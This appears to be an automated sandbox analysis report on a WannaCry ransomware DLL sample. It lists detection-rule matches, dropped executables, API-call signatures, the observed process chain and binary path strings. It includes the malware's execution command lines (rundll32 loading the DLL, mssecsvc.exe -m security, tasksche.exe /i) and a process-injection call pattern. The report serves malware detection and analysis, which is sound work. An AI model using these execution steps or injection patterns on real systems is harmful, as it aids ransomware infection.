Source: 00000006.00000000.391018672.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000004.00000000.384240153.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000004.00000002.706767542.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000006.00000000.388277654.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000006.00000000.392238630.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000006.00000000.386126124.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000004.00000000.385681867.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: C:\Windows\mssecsvc.exe, type: DROPPED, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: C:\Windows\mssecsvc.exe, type: DROPPED, Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\WINDOWS\mssecsvc.exe
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B03CF0
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B03CC2
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B028C8
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B03D36
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B03C3D
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B03D1F
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B03D4B
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA3CF0
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA28C8
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA3CC2
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA4C9E
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA3D4B
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA3C3D
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA3D36
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA3D1F
                Source: C:\Windows\tasksche.exe | Code function: 19_2_00406C40
                Source: C:\Windows\tasksche.exe | Code function: 19_2_00402A76
                Source: C:\Windows\tasksche.exe | Code function: 19_2_00402E7E
                Source: C:\Windows\tasksche.exe | Code function: 19_2_0040350F
                Source: C:\Windows\tasksche.exe | Code function: 19_2_00404C19
                Source: C:\Windows\tasksche.exe | Code function: 19_2_0040541F
                Source: C:\Windows\tasksche.exe | Code function: 19_2_00403797
                Source: C:\Windows\tasksche.exe | Code function: 19_2_004043B7
                Source: C:\Windows\tasksche.exe | Code function: 19_2_004031BC
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B005F2 FindCloseChangeNotification,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,FindCloseChangeNotification,FindCloseChangeNotification
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B0042D GetModuleHandleA,GetVersion,VirtualAlloc,FindCloseChangeNotification,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,FindCloseChangeNotification
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B0252F NtOpenSection
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B02574 NtMapViewOfSection,FindCloseChangeNotification,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B02477 NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B0144A LookupPrivilegeValueA,NtAdjustPrivilegesToken
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B024AE lstrcpyW,lstrlenW,NtCreateSection
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B033E0 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B01422 LookupPrivilegeValueA,NtAdjustPrivilegesToken
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B03405 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA33E0 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA05F2 CloseHandle,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,CloseHandle
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA24AE lstrcpyW,lstrlenW,NtCreateSection
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA2477 NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA2574 NtMapViewOfSection,CloseHandle,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA144A LookupPrivilegeValueA,NtAdjustPrivilegesToken
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA252F NtOpenSection
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA042D GetModuleHandleA,GetVersion,VirtualAlloc,CloseHandle,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA1422 LookupPrivilegeValueA,NtAdjustPrivilegesToken
                Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA3405 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile
                Source: mssecsvc.exe.2.dr | Static PE information: Resource name: R type: PE32 executable (GUI) Intel 80386, for MS Windows
                Source: tasksche.exe.6.dr | Static PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract
                Source: HFKDS6VcNO.dll | Virustotal: Detection: 86%
                Source: HFKDS6VcNO.dll | ReversingLabs: Detection: 89%
                Source: HFKDS6VcNO.dll | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll"
                Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll",#1
                Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\HFKDS6VcNO.dll,PlayGame
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll",#1
                Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe
                Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll",PlayGame
                Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe
                Source: unknown | Process created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe -m security
                Source: C:\Windows\mssecsvc.exe | Process created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i
                Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll",#1
                Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\HFKDS6VcNO.dll,PlayGame
                Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll",PlayGame
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll",#1
                Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe
                Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe
                Source: C:\Windows\mssecsvc.exe | Process created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i
                Source: C:\Windows\mssecsvc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                Source: mssecsvc.exe.2.dr | Binary string: /\Device\HarddiskVolume2\Windows\Temp\avg_a01924
                Source: mssecsvc.exe.2.dr | Binary string: C\Device\HarddiskVolume2\Windows\SoftwareDistribution\DataStore\Logs
                Source: mssecsvc.exe.2.dr | Binary string: 7\Device\HarddiskVolume2\Windows\System32\CertPolEng.dll A
                Source: mssecsvc.exe.2.dr | Binary string: \Device\HarddiskVolume2\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
                Source: mssecsvc.exe.2.dr | Binary string: @\Device\HarddiskVolume2\Windows\System32\ru-RU\WinSATAPI.dll.mui
                Source: mssecsvc.exe.2.dr | Binary string: :\Device\HarddiskVolume2\Windows\System32\drivers\dmvsc.sysT
                Source: mssecsvc.exe.2.dr | Binary string: p\Device\HarddiskVolume2\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\History\History.IE5@
                Source: mssecsvc.exe.2.dr | Binary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\parvdm.sysAUH
                Source: mssecsvc.exe.2.dr | Binary string: 2\Device\HarddiskVolume2\Windows\System32\fveui.dll
                Source: mssecsvc.exe.2.dr | Binary string: :\Device\HarddiskVolume2\Windows\System32\wercplsupport.dll
                Source: mssecsvc.exe.2.dr | Binary string: I\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\Locationp
                Source: mssecsvc.exe.2.dr | Binary string: 5\Device\HarddiskVolume2\Windows\System32\QAGENTRT.DLL
                Source: mssecsvc.exe.2.dr | Binary string: 0\Device\HarddiskVolume2\Windows\inf\netmscli.PNFC
                Source: mssecsvc.exe.2.dr | Binary string: d\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Cachesp
                Source: mssecsvc.exe.2.dr | Binary string: \\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.dr | Binary string: <\Device\HarddiskVolume2\Program Files\AVG Web TuneUp\lip.exep
                Source: mssecsvc.exe.2.dr | Binary string: <\Device\HarddiskVolume2\Windows\System32\drivers\crcdisk.sysp
                Source: mssecsvc.exe.2.dr | Binary string: :\Device\HarddiskVolume2\Windows\System32\drivers\dmvsc.sysd
                Source: mssecsvc.exe.2.dr | Binary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\NV_AGP.SYS
                Source: mssecsvc.exe.2.dr | Binary string: <\Device\HarddiskVolume2\Windows\System32\drivers\acpipmi.sysH
                Source: mssecsvc.exe.2.dr | Binary string: <\Device\HarddiskVolume2\Windows\System32\drivers\ndiscap.sys
                Source: mssecsvc.exe.2.dr | Binary string: 4\Device\HarddiskVolume2\Windows\System32\cabinet.dll
                Source: mssecsvc.exe.2.dr | Binary string: \Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5ABCO
                Source: mssecsvc.exe.2.dr | Binary string: =\Device\HarddiskVolume2\Windows\System32\drivers\VMBusHID.sys&
                Source: mssecsvc.exe.2.dr | Binary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\volsnap.inf_loc
                Source: mssecsvc.exe.2.dr | Binary string: h\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.dr | Binary string: 3\Device\HarddiskVolume2\Windows\System32\mapi32.dll
                Source: mssecsvc.exe.2.dr | Binary string: <\Device\HarddiskVolume2\Windows\System32\drivers\BrSerId.sys
                Source: mssecsvc.exe.2.dr | Binary string: +\Device\HarddiskVolume2\Windows\System32\ru_PTC
                Source: mssecsvc.exe.2.dr | Binary string: L\Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\LocalH
                Source: mssecsvc.exe.2.dr | Binary string: <\Device\HarddiskVolume2\Windows\System32\drivers\crcdisk.sys?
                Source: mssecsvc.exe.2.dr | Binary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\monitor.inf_loc
                Source: mssecsvc.exe.2.dr | Binary string: [\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\Windows Filtering Platform
                Source: mssecsvc.exe.2.dr | Binary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\keyboard.inf_loc
                Source: mssecsvc.exe.2.dr | Binary string: :\Device\HarddiskVolume2\Windows\System32\drivers\dmvsc.sys;
                Source: mssecsvc.exe.2.dr | Binary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnbr003.catp
                Source: mssecsvc.exe.2.dr | Binary string: <\Device\HarddiskVolume2\Windows\System32\drivers\mskssrv.sys
                Source: mssecsvc.exe.2.dr | Binary string: <\Device\HarddiskVolume2\Windows\System32\drivers\ws2ifsl.sysv
                Source: mssecsvc.exe.2.dr | Binary string: =\Device\HarddiskVolume2\Windows\System32\drivers\MTConfig.sys
                Source: mssecsvc.exe.2.dr | Binary string: <\Device\HarddiskVolume2\Windows\System32\drivers\storvsc.sys,
                Source: mssecsvc.exe.2.dr | Binary string: 3\Device\HarddiskVolume2\Windows\System32\sppsvc.exeI
                Source: mssecsvc.exe.2.dr | Binary string: 4\Device\HarddiskVolume2\Windows\System32\desktop.inip
                Source: mssecsvc.exe.2.dr | Binary string: K\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\PLA\System_CPU
                Source: mssecsvc.exe.2.dr | Binary string: F\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\Shell
                Source: mssecsvc.exe.2.dr | Binary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netrass.inf_loc0D
                Source: mssecsvc.exe.2.dr | Binary string: t\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.dr | Binary string: :\Device\HarddiskVolume2\Windows\System32\drivers\amdk8.sys
                Source: mssecsvc.exe.2.dr | Binary string: :\Device\HarddiskVolume2\Windows\System32\drivers\dmvsc.sys@
                Source: mssecsvc.exe.2.dr | Binary string: 2\Device\HarddiskVolume2\Windows\System32\umrdp.dllSTRP
                Source: mssecsvc.exe.2.dr | Binary string: 3\Device\HarddiskVolume2\Windows\System32\sppsvc.exer
                Source: mssecsvc.exe.2.dr | Binary string: 8\Device\HarddiskVolume2\Program Files\AVG\Av\avgcmgr.exeST
                Source: mssecsvc.exe.2.dr | Binary string: -\Device\HarddiskVolume2\Windows\inf\mshdc.PNFp
                Source: mssecsvc.exe.2.dr | Binary string: <\Device\HarddiskVolume2\Windows\System32\drivers\sfloppy.sysR_
                Source: mssecsvc.exe.2.dr | Binary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Gadget-Platform-Package~31bf3856ad364e35~x86~~6.1.7601.17514.catp
                Source: mssecsvc.exe.2.dr | Binary string: =\Device\HarddiskVolume2\Windows\System32\drivers\1394ohci.sysp
                Source: mssecsvc.exe.2.dr | Binary string: z\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.236.Crwl_^]
                Source: mssecsvc.exe.2.dr | Binary string: 3\Device\HarddiskVolume2\Windows\System32\DFDWiz.exeU0IS$
                Source: mssecsvc.exe.2.dr | Binary string: >\Device\HarddiskVolume2\Windows\System32\ru-RU\runonce.exe.mui+
                Source: mssecsvc.exe.2.dr | Binary string: /\Device\HarddiskVolume2\Windows\inf\ndiscap.PNF
                Source: mssecsvc.exe.2.dr | Binary string: 4\Device\HarddiskVolume2\Windows\System32\bthserv.dll
                Source: mssecsvc.exe.2.dr | Binary string: 5\Device\HarddiskVolume2\Windows\System32\msshooks.dllp
                Source: mssecsvc.exe.2.dr | Binary string: =\Device\HarddiskVolume2\Windows\System32\drivers\intelide.sys
                Source: mssecsvc.exe.2.dr | Binary string: 4\Device\HarddiskVolume2\Windows\SoftwareDistribution
                Source: mssecsvc.exe.2.dr | Binary string: <\Device\HarddiskVolume2\Windows\System32\drivers\TsUsbGD.sys
                Source: mssecsvc.exe.2.dr | Binary string: =\Device\HarddiskVolume2\ProgramData\Avg\log\AV16\shredlog.cfgp
                Source: mssecsvc.exe.2.dr | Binary string: \Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F94FD5F2AAEFDB64257601230509A4E9H
                Source: mssecsvc.exe.2.dr | Binary string: <\Device\HarddiskVolume2\ProgramData\Avg\log\AV16\krnlapi.cfgp
                Source: mssecsvc.exe.2.dr | Binary string: Y\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs
                Source: mssecsvc.exe.2.dr | Binary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-Ultimate-Client-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
                Source: mssecsvc.exe.2.dr | Binary string: 3\Device\HarddiskVolume2\Windows\System32\gptext.dll
                Source: mssecsvc.exe.2.dr | Binary string: 4\Device\HarddiskVolume2\Windows\System32\ListSvc.dll
                Source: mssecsvc.exe.2.dr | Binary string: ~\Device\HarddiskVolume2\ProgramData\Microsoft\Windows\Caches\{7CD55808-3D38-4DD5-90C9-62F0E6EE60D4}.2.ver0x0000000000000001.db
                Source: mssecsvc.exe.2.dr | Binary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\hidbth.sysH
                Source: mssecsvc.exe.2.dr | Binary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\arcsas.sysX
                Source: mssecsvc.exe.2.dr | Binary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netpacer.inf_locDa
                Source: mssecsvc.exe.2.dr | Binary string: 2\Device\HarddiskVolume2\Windows\System32\msdtc.exe
                Source: mssecsvc.exe.2.dr | Binary string: 2\Device\HarddiskVolume2\Windows\System32\wmpps.dll
                Source: mssecsvc.exe.2.dr | Binary string: U\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.dr | Binary string: 4\Device\HarddiskVolume2\Windows\System32\fdeploy.dllW
                Source: mssecsvc.exe.2.dr | Binary string: =\Device\HarddiskVolume2\Windows\Temp\SecurityScan_Release.exep
                Source: mssecsvc.exe.2.dr | Binary string: X\Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft
                Source: mssecsvc.exe.2.dr | Binary string: ,\Device\HarddiskVolume2\Windows\System32\ras$X
                Source: mssecsvc.exe.2.dr | Binary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientExtensions-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.catp
                Source: mssecsvc.exe.2.dr | Binary string: Z\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb
                Source: mssecsvc.exe.2.dr | Binary string: :\Device\HarddiskVolume2\Windows\System32\drivers\vhdmp.sys
                Source: mssecsvc.exe.2.dr | Binary string: F\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\AppIDp
                Source: mssecsvc.exe.2.dr | Binary string: <\Device\HarddiskVolume2\Windows\System32\drivers\drmkaud.sysCP
                Source: mssecsvc.exe.2.dr | Binary string: #\Device\HarddiskVolume3\
                Source: mssecsvc.exe.2.dr | Binary string: +\Device\HarddiskVolume2\Windows\Performance
                Source: mssecsvc.exe.2.dr | Binary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\errdev.sys
                Source: mssecsvc.exe.2.dr | Binary string: <\Device\HarddiskVolume2\Windows\System32\drivers\drmkaud.sys
                Source: mssecsvc.exe.2.dr | Binary string: 3\Device\HarddiskVolume2\Windows\System32\WsmSvc.dll
                Source: mssecsvc.exe.2.dr | Binary string: 3\Device\HarddiskVolume2\Windows\ehome\ehprivjob.exe
                Source: mssecsvc.exe.2.dr | Binary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Drivers-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat
                Source: mssecsvc.exe.2.dr | Binary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\nvstor.sysojec
                Source: mssecsvc.exe.2.dr | Binary string: ;\Device\HarddiskVolume2\ProgramData\Avg\log\AV16\csllog.cfgLL
                Source: mssecsvc.exe.2.dr | Binary string: 0\Device\HarddiskVolume2\Windows\inf\keyboard.PNF
                Source: mssecsvc.exe.2.dr | Binary string: m\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\Myp
                Source: mssecsvc.exe.2.dr | Binary string: :\Device\HarddiskVolume2\Windows\System32\wbem\WmiApSrv.exe
                Source: mssecsvc.exe.2.dr | Binary string: ;\Device\HarddiskVolume2\Windows\Temp\CR_6DDFF.tmp\setup.exekVh
                Source: mssecsvc.exe.2.dr | Binary string: :\Device\HarddiskVolume2\Windows\System32\drivers\evbdx.sys
                Source: mssecsvc.exe.2.dr | Binary string: I\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.dr | Binary string: +\Device\HarddiskVolume2\Windows\System32\en
                Source: mssecsvc.exe.2.dr | Binary string: 5\Device\HarddiskVolume2\Windows\System32\certprop.dll
                Source: mssecsvc.exe.2.dr | Binary string: L\Device\HarddiskVolume2\ProgramData\Microsoft\Windows\Start Menu\desktop.inip
                Source: mssecsvc.exe.2.dr | Binary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\NV_AGP.SYS\S
                Source: mssecsvc.exe.2.dr | Binary string: W\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.dr | Binary string: =\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.dr | Binary string: O\Device\HarddiskVolume2\Windows\Temp\avg_a04392\avg-secure-search-installer.exep
                Source: mssecsvc.exe.2.dr | Binary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\rasacd.sys6
                Source: mssecsvc.exe.2.dr | Binary string: -\Device\HarddiskVolume2\Windows\inf\input.PNFp
                Source: mssecsvc.exe.2.dr | Binary string: 4\Device\HarddiskVolume2\Windows\System32\w32time.dllBU
                Source: mssecsvc.exe.2.dr | Binary string: <\Device\HarddiskVolume2\Windows\System32\ru-RU\duser.dll.muiIOp
                Source: mssecsvc.exe.2.dr | Binary string: =\Device\HarddiskVolume2\Windows\System32\drivers\sisraid2.sys
                Source: mssecsvc.exe.2.dr | Binary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\parvdm.sysH
                Source: mssecsvc.exe.2.dr | Binary string: 4\Device\HarddiskVolume2\Windows\System32\ssdpsrv.dllTD
                Source: mssecsvc.exe.2.dr | Binary string: >\Device\HarddiskVolume2\Program Files\AVG Web TuneUp\TBAPI.dllM
                Source: mssecsvc.exe.2.dr | Binary string: -\Device\HarddiskVolume2\Windows\inf\oem10.PNFp
                Source: mssecsvc.exe.2.dr | Binary string: L\Device\HarddiskVolume2\Program Files\Remote Access Host\RemoteSoundServ.exei
                Source: mssecsvc.exe.2.dr | Binary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\hdaudbus.inf_loc
                Source: mssecsvc.exe.2.dr | Binary string: I\Device\HarddiskVolume2\System Volume Information\SystemRestore\FRStagingp
                Source: mssecsvc.exe.2.dr | Binary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\rasacd.sysH
                Source: mssecsvc.exe.2.dr | Binary string: 3\Device\HarddiskVolume2\Windows\System32\mssrch.dll
                Source: mssecsvc.exe.2.dr | Binary string: P\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.dr | Binary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\battery.inf_loc
                Source: mssecsvc.exe.2.dr | Binary string: 2\Device\HarddiskVolume2\Windows\System32\fveui.dllal8
                Source: mssecsvc.exe.2.dr | Binary string: +\Device\HarddiskVolume2\Windows\System32\ru1
